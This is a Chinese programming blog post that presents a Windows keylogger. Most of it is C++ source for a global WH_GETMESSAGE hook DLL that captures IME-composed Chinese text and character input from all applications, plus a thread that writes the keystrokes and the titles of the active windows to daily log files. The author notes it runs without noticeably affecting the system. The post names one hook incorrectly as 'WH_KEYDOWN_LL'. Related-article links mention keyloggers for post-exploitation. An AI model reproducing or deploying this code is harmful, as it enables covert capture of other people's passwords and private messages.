键盘记录工具(支持中文)

最新推荐文章于 2023-04-04 17:25:16 发布
最新推荐文章于 2023-04-04 17:25:16 发布
阅读量1.3k 收藏 2
点赞数
分类专栏: 系统编程

       记录键盘,很显然需要使用钩子。如果只是记录所按下的按键,使用WH_KEYDOWN_LL即可,此钩子可以拦截所有按下键盘的动作(除极少数键外)。但是如果要记录通过输入法输入的中文字符,那么WH_KEYDOWN_LL是不够的,这里需要使用WH_GETMESSAGE钩子。这个钩子拦截所有从消息队列中取出的消息。而windows上所有的输入法基本上都是采用将输入字符翻译成汉字之后,通过PostMessage将汉字回发给应用程序。所以利用WH_GETMESSAGE钩子,在应用程序从消息队列中取出汉字消息之前对消息进行拦截,从而记录。

       下面是HOOKDLL中的主要代码:

       WH_GETMESSAGE全局钩子,其钩子回调函数必须写在DLL中,不能通过传递函数指针的方式,将回调函数体写在其他Model中。

这里采用内存文件映射的方法来达到数据共享。共享的数据包括记录线程的ID,中文字符。回调函数在拦截到中文字符消息时,将中文字符保存到共享内存中,然后通过PostThreadMessage通知记录线程。

WM_IME_COMPOSITION:当输入法将转换后的中文字符推送到应用程序时,应用程序会处理此消息。

[cpp] view plain copy
  1. BOOL CHookSystem::Start(int hookID)  
  2. {  
  3.     if(g_hook)  
  4.         Stop();  
  5.   
  6.     if(!g_hook)  
  7.     {  
  8.         HOOKPROC lpfn = NULL;  
  9.         if(hookID == WH_GETMESSAGE)  
  10.             lpfn = MessageProc;  
  11.         else  
  12.             lpfn = MessageProc;  
  13.   
  14.         g_hook = ::SetWindowsHookEx(hookID, lpfn, CApplication::Hinst, 0); // 默认安装全局钩子,因为这是在dll中  
  15.         DWORD m = ::GetLastError();  
  16.         m_hookID = hookID;  
  17.   
  18.         ::PostMessage(NULL, WM_NULL, 0,0);  
  19.           
  20.         return g_hook == NULL ? FALSE : TRUE;  
  21.     }  
  22.     else  
  23.         return FALSE;  
  24. }  

[cpp] view plain copy
  1. BOOL CHookSystem::Stop()  
  2. {  
  3.     if(g_hook && !::UnhookWindowsHookEx(g_hook))  
  4.         return FALSE;  
  5.     else  
  6.     {  
  7.         g_hook = NULL;  
  8.         m_hookID = 0;  
  9.         return TRUE;  
  10.     }  
  11. }  

[cpp] view plain copy
  1. LRESULT CALLBACK CHookSystem::MessageProc(int nCode, WPARAM wParam, LPARAM lParam)  
  2. {  
  3.     LRESULT lResult = ::CallNextHookEx(g_hook, nCode, wParam, lParam);  
  4.   
  5.     if(nCode < 0)  
  6.         return lResult;  
  7.   
  8.     HANDLE hThreadid = ::OpenFileMapping(FILE_MAP_WRITE, false, TEXT("ThreadID"));// 打开文件映射对象ThreadID  
  9.     if(hThreadid)  
  10.     {  
  11.         int * pThreadid = (int *)::MapViewOfFile(hThreadid, FILE_MAP_READ|FILE_MAP_WRITE, 0, 0, 0);  
  12.         if(pThreadid)  
  13.             KBthreadid = (*pThreadid);  
  14.         else  
  15.             return lResult;  
  16.   
  17.         UnmapViewOfFile(pThreadid); // 撤销此次映射  
  18.     }  
  19.     else  
  20.     {  
  21.         return lResult;  
  22.     }  
  23.   
  24.     TCHAR * pCNString;  
  25.   
  26.     PMSG pmsg = (PMSG)lParam;  
  27.     if (nCode == HC_ACTION)  
  28.     {  
  29.         switch (pmsg->message)  
  30.         {  
  31.         case WM_IME_COMPOSITION:  
  32.             {  
  33.                 //::MessageBox(NULL,TEXT("WM_IME_COMPOSITION"),TEXT("no"),MB_OK);  
  34.                 HIMC hIMC;  
  35.                 HWND hWnd=pmsg->hwnd;  
  36.                 DWORD dwSize;  
  37.                 TCHAR ch;  
  38.                 TCHAR lpstr[MAX_CN_STRING_LEN];  
  39.                 if(pmsg->lParam & GCS_RESULTSTR)  
  40.                 {  
  41.                     HANDLE hCNString = ::OpenFileMapping(FILE_MAP_WRITE,false, TEXT("CNString"));  
  42.                     if(hCNString)   
  43.                         pCNString = (TCHAR *)::MapViewOfFile(hCNString,FILE_MAP_READ|FILE_MAP_WRITE,0,0,0);  
  44.                     else  
  45.                         return lResult;  
  46.   
  47.                     if(!pCNString)  
  48.                         return lResult;  
  49.   
  50.                     //先获取当前正在输入的窗口的输入法句柄  
  51.                     hIMC = ImmGetContext(hWnd);  
  52.                     if (!hIMC)  
  53.                         return lResult;  
  54.   
  55.                     // 先将ImmGetCompositionString的获取长度设为0来获取字符串大小.  
  56.                     dwSize = ImmGetCompositionString(hIMC, GCS_RESULTSTR, NULL, 0);  
  57.   
  58.                     // 缓冲区大小要加上字符串的NULL结束符大小,  
  59.                     //   考虑到UNICODE  
  60.                     dwSize += sizeof(WCHAR);  
  61.   
  62.                     memset(lpstr, 0, MAX_CN_STRING_LEN);  
  63.   
  64.                     // 再调用一次.ImmGetCompositionString获取字符串  
  65.                     ImmGetCompositionString(hIMC, GCS_RESULTSTR, lpstr, dwSize);  
  66.   
  67.                     //现在lpstr里面即是输入的汉字了。你可以处理lpstr,当然也可以保存为文件...  
  68.                     //MessageBox(NULL, lpstr, lpstr, MB_OK);   
  69.   
  70.                     _tcscpy(pCNString, lpstr); // 拷贝到共享内存中  
  71.                     ImmReleaseContext(hWnd, hIMC);  
  72.   
  73.                     UnmapViewOfFile(pCNString); // 撤销此次映射  
  74.   
  75.                     PostThreadMessage(KBthreadid,WM_KEYHOOK_CN_EN, wParam, lParam);  
  76.                 }  
  77.             }  
  78.             break;  
  79.         case WM_CHAR:  //截获发向焦点窗口的键盘消息  
  80.             {  
  81.                 PostThreadMessage(KBthreadid,WM_KEYHOOK_CN, pmsg->wParam, pmsg->lParam);  
  82.             }  
  83.             break;  
  84.         }  
  85.     }  
  86.   
  87.     return(lResult);  
  88. }  


       下面是负责记录程序的主要代码:

       记录键盘信息是一个实时性比较高的任务,为了不影响前台界面,这里需要采用子线程的方式来进行记录。

在子线程处理函数中,通过PeekMessage来获取线程消息。在消息处理函数中,将输入的字符记录到文件中。

[cpp] view plain copy
  1. void CMainWnd::StartKeyMonitorThread()  
  2. {  
  3.     ::_beginthread(HookKeyBoardThread, 0, NULL);  
  4. }  

[cpp] view plain copy
  1. void CMainWnd::StopKeyMonitorThread()  
  2. {  
  3.     ::PostThreadMessage(ms_keyMonitorThreadID, WM_QUIT, 0, 0);  
  4.     ::CloseHandle(hThreadid);  
  5.     ::CloseHandle(hCNString);  
  6.     ms_keyMonitorThreadID = 0;  
  7.     hThreadid = NULL;  
  8.     hCNString = NULL; // 防止句柄被释放两次  
  9. }  

[cpp] view plain copy
  1. VOID CMainWnd::HookKeyBoardThread(LPVOID info)  
  2. {  
  3.     ms_keyMonitorThreadID = ::GetCurrentThreadId();  
  4.     int threadid = ms_keyMonitorThreadID;  
  5.   
  6.     hThreadid=CreateFileMapping((HANDLE)0xffffffff,NULL,PAGE_READWRITE,0,sizeof(int), TEXT("ThreadID"));  
  7.     hCNString=CreateFileMapping((HANDLE)0xffffffff,NULL,PAGE_READWRITE,0,MAX_CN_STRING_LEN, TEXT("CNString"));  
  8.   
  9.     if(hThreadid)  
  10.     {  
  11.         int *pThreadid = (int *)MapViewOfFile(hThreadid,FILE_MAP_READ|FILE_MAP_WRITE,0,0,0);  
  12.         if(pThreadid)   
  13.             *pThreadid = threadid;  
  14.         else  
  15.         {  
  16.             CBaseWnd::MessageBox(TEXT("创建内存映射失败"));  
  17.             return;  
  18.         }  
  19.   
  20.         UnmapViewOfFile(pThreadid); // 撤销此次映射  
  21.     }  
  22.     else  
  23.     {  
  24.         CBaseWnd::MessageBox(TEXT("创建内存映射失败"));  
  25.         return;  
  26.     }  
  27.   
  28.     MSG msg;  
  29.   
  30.     CString oldInputWndName;  
  31.   
  32.     while(true)  
  33.     {  
  34.         if(PeekMessage(&msg,NULL,WM_KEYHOOK_CN,WM_KEYHOOK_CN,PM_REMOVE))  
  35.         {  
  36.             //const DWORD tid = GetWindowThreadProcessId(GetForegroundWindow(),NULL);  
  37.             //AttachThreadInput(tid, GetCurrentThreadId(),TRUE);  
  38.             CBaseWnd * pWnd = CBaseWnd::FromHandle(GetForegroundWindow()/*::GetFocus()*/);  
  39.             CString curInputWndName;  
  40.             if(pWnd != NULL)  
  41.                 curInputWndName = pWnd->GetWndName();  
  42.             //AttachThreadInput(tid, GetCurrentThreadId(),FALSE);  
  43.               
  44.             CString fileName = (m_logPath + (CDateTime::Now().ToShortDate() + TEXT(".log")));  
  45.             CFileStreamC file(fileName);  
  46.   
  47.             if(curInputWndName.GetLength() > 0 && curInputWndName != oldInputWndName)  
  48.             {  
  49.                 oldInputWndName = curInputWndName;  
  50.                 file.Write(TEXT("\n[%s] "), curInputWndName.GetCStr());  
  51.             }  
  52.   
  53.             TCHAR str[20] = {0};  
  54.             int len = MyGetKeyNameText(msg.wParam, str, sizeof(str)/sizeof(TCHAR));//获得控制键名字,可能是非控制键则返回为空  
  55.             if(len > 0)  
  56.                 file.Write(TEXT("(%s)"), str);  
  57.             else  
  58.                 file.Write(TEXT("%c"), msg.wParam);  
  59.                   
  60.         }  
  61.   
  62.         if(PeekMessage(&msg,NULL,WM_KEYHOOK_CN_EN,WM_KEYHOOK_CN_EN,PM_REMOVE))  
  63.         {  
  64.             TCHAR *pCNString;  
  65.             HANDLE hCNString=OpenFileMapping(FILE_MAP_WRITE,false, TEXT("CNString"));  
  66.   
  67.             if(hCNString)  
  68.                 pCNString=(TCHAR *)MapViewOfFile(hCNString,FILE_MAP_READ|FILE_MAP_WRITE,0,0,0);  
  69.             else  
  70.                 continue;  
  71.   
  72.             //const DWORD tid = GetWindowThreadProcessId(GetForegroundWindow(),NULL);  
  73.             //AttachThreadInput(tid, GetCurrentThreadId(),TRUE);  
  74.             CBaseWnd * pWnd = CBaseWnd::FromHandle(GetForegroundWindow()/*::GetFocus()*/);  
  75.             CString curInputWndName;  
  76.             if(pWnd != NULL)  
  77.                 curInputWndName = pWnd->GetWndName();  
  78.             //AttachThreadInput(tid, GetCurrentThreadId(),FALSE);  
  79.   
  80.             CString fileName = (m_logPath + (CDateTime::Now().ToShortDate() + TEXT(".log")));  
  81.             CFileStreamC file(fileName);  
  82.               
  83.             if(curInputWndName.GetLength() > 0 && curInputWndName != oldInputWndName)  
  84.             {  
  85.                 oldInputWndName = curInputWndName;  
  86.                 file.Write(TEXT("\n[%s] "), curInputWndName.GetCStr());  
  87.             }  
  88.   
  89.             file.Write(TEXT("%s"), pCNString);  
  90.   
  91.             memset(pCNString,0,MAX_CN_STRING_LEN);  
  92.   
  93.             UnmapViewOfFile(pCNString); // 撤销此次映射  
  94.         }  
  95.   
  96.         if(PeekMessage(&msg,NULL,WM_QUIT,WM_QUIT,PM_REMOVE))   
  97.         {  
  98.             break;  
  99.         }  
  100.   
  101.         Sleep(1);  
  102.     }  
  103.   
  104.     return;  
  105. }  

       实际效果截图:


这里在记录中文输入的同时,还记录的了当前所输入的窗口标题。

个别字符有乱码的情况,这是因为部分不可见字符没有进行屏蔽。

这个工具可以记录大部分中午输入,效率也还是很不错的,正常运行后,基本不会影响系统的正常使用。

seaskying
关注
专栏目录
通过HOOK来截获中文输入
01-11
通过HOOK来截获中文输入 用VC代码编写
编程实现键盘记录功能
hxb002131的博客
03-28 5848
目录 1、安装python2.7 2、安装pycharm edu 3、安装完成之后进行相关库的安装 ​4、在pycharm中添加解释器 5、对键盘记录功能的代码 6、实验代码的运行 1、安装python2.7 (1)下载安装程序 下载链接如下:https://www.python.org/downloads/release/python-2712/ (2)打开上述链接,显示如下: 根据自己电脑配置进行选择,我的是win7 64位,所以我选择的是上述截图中红圈圈中的版本,点击左侧
工具开发|键盘记录工具原理及代码实现
weixin_42282189的博客
11-26 1395
作者: Beard林 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。 0x01 对于键盘记录简述 键盘记录一般用在后渗透中,以此方法寻求扩大战果。有些c2工具集成了这个功能,github上也有一些独立的工具,因为开发的语言不一样,大小也不一样,实用性也各不相同。 0x02 拆分键盘记录 键盘记录工具其实就是设置了一个钩子来获取按键的输入,流程如下: 1.工具创建进程 2.调用windows API 3.利用API钩子获取按键输入 4.将获取数据保存 用python实现以上要.
3.6 Meterpreter 键盘记录
qq_55202378的博客
07-23 3641
meterpreter
电脑软件键盘测试工具KeyBoardTest.rar
10-25
5. 多语言支持:高级的测试工具可能支持多种语言的键盘布局,包括但不限于英文、中文、日文等。 6. 自定义测试:用户可能可以选择只测试特定区域的按键,或者进行连续按键、组合键的测试。 总的来说,KeyBoardTest...
键盘测试工具
02-27
5. 多语言支持:考虑到全球用户的使用需求,工具通常会提供多种语言界面,包括中文,让用户更加便捷地进行操作。 6. 兼容性广泛:这类工具一般能与各种操作系统兼容,包括Windows、Mac OS和Linux等,满足不同平台...
winometer鼠标键盘记录次数
11-25
综上所述,WinOMeter是一款轻量级的、易于使用的鼠标键盘记录工具,适用于各种需要监控用户输入行为的场景。其核心功能由hook.dll实现,用户可以通过WinOMeter.exe启动服务,并通过阅读license.txt和readme.txt来...
易语言自选键盘记录器源码
06-01
7. **用户界面设计**:易语言支持GUI(图形用户界面)编程,可以让用户方便地启动和停止键盘记录器,查看已记录的键盘输入等。良好的界面设计能让软件更易于理解和使用。 在"SanYe"标签下,我们可以推测这可能是由...
易语言源码Winio做的键盘记录.rar
02-15
在本压缩包“易语言源码Winio做的键盘记录.rar”中,包含的是使用易语言编写的键盘记录器程序源代码。键盘记录器是一种能够捕获并记录用户键盘输入的软件,通常用于系统监控、数据分析或者恶意行为,如密码窃取。 ...
HOOK禁止键盘输入
10-23
vba调用HOOK函数禁用鼠标、键盘,方便后台程序执行,但没有禁止任务管理器
键盘记录器Vb版,VisualBasic6.0源代码
05-07
摘要:VB源码,系统相关,键盘记录器  基于VB源码的键盘记录器,打开程序后,可记录下键盘按键的所有动作,点击了哪一个键,都可以记录到,而且程序在VB6环境下直接编译就行了。以前发过类似的键盘记录器源码,可能在创作思路上会有所不同。
Winio做的键盘记录.zip易语言项目例子源码下载
03-21
在本项目"Winio做的键盘记录.zip"中,我们可以看到一个使用易语言编写的键盘记录器的示例源码。这个项目非常适合初学者、学生以及小型团队来学习和参考,用于提升他们的编程技能。 键盘记录器是计算机安全领域的一...
HKproc.dcu.rar_delphi 键盘记录_keylogger_keylogger delphi
09-24
描述中提到“这是一份键盘记录源码,但不支持中文支持特殊符号。”这意味着这个源代码能够捕捉并记录英文和其他非中文字符的输入,可能是因为它没有处理Unicode或GB2312等中文编码方式,因此在处理中文字符时会...
易语言-易语言键盘记录软件
06-25
键盘记录器,也称为键盘嗅探器,是一种能够捕获并记录用户在计算机上敲击键盘输入的软件工具。这类程序通常用于系统监控、数据收集或安全测试等场景,但同时也可能被滥用,因此在使用时需遵守法律法规。 描述中的...
键盘监控的实现Ⅰ——Keyboard Hook API函数
fei321321的博客
06-15 907
键盘监控的实现Ⅰ——Keyboard Hook API函数   在实际应用中,键盘监控是一种很常见的技术,它包括按键的记录、按键的过滤、按键的修改(映射)等。比方说,我们想统计用户的击键情况,这个就是按键的记录;我们想屏蔽某些系统键(例如Alt键、Win键),这个是按键的过滤;我们想改变按键的值,例如按下A,出来的是Z,在例如按下A,出来按键的组合SDFG等(貌似这个在游戏中比较多,有些游戏的大绝招都比较难按,用这个一劳永逸),这个是按键的修改。 键盘监控的具体实现,用的是微软的Keyboard Hook
如何捕捉键盘中英文输入
Cougars的博客
10-10 4006
      最近在完成一个项目,需要捕捉用户的输入,传统的Keylogger网上资料较多,但捕捉的是按键输入,对于大量的中文输入,单纯键盘按键输入没有什么意义。本文说明如何实现中英文的输入捕捉。     一、实现思路             通过Windows钩子,截获每个应用程序的输入消息,获取输入内容。英文输入捕捉WM_CHAR消息,中文输入则铺捉WM_IME_ENDCOMPOSITIO...
深入分析C#键盘勾子(Hook)拦截器,屏蔽键盘活动的详解
最新发布
weixin_42099527的博客
04-04 3187
这个列表的指针指向指定的,应用程 序定义的,被Hook子程调用的回调函数,也就是该钩子的各个处理子程。最近安装的钩子放在链的开始, 而最早安装的钩子放在最后,也就是后加入的先获得控制权。也就是说每个进程所拥有的相同的DLL的全局数据,它们的名称相同,但其值却并不一定是相同的,而且是互不干涉的。在钩子子程中调用得到控制权的钩子函数在完成对消息的处理后,如果想要该消息继续传递,那么它必须调用另外一个 SDK中的API函数CallNextHookEx来传递它,以执行钩子链表所指的下一个钩子子程。
Inline hook ImmGetCompositionStringW获取中文输入
CoderAldrich的专栏
01-23 2601
// dllmain.cpp : 定义 DLL 应用程序的入口点。 // 本程序通过hook ImmGetCompositionStringW获取中文输入记录 // #include "stdafx.h" #define OPCODESIZE 6 #define INFO_BUFFER_SIZE 32767 typedef BOOL(WINAPI *lpImmGetCompositionS
Delphi键盘记录源码解析及特殊符号支持
由于描述中提到的源码不支持中文,这意味着在设计Keylogger时,程序可能没有处理中文字符的编码问题,或者没有考虑到不同语言环境下的字符集支持。在实际的开发中,处理多语言字符集是常见的需求,特别是对于可能...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值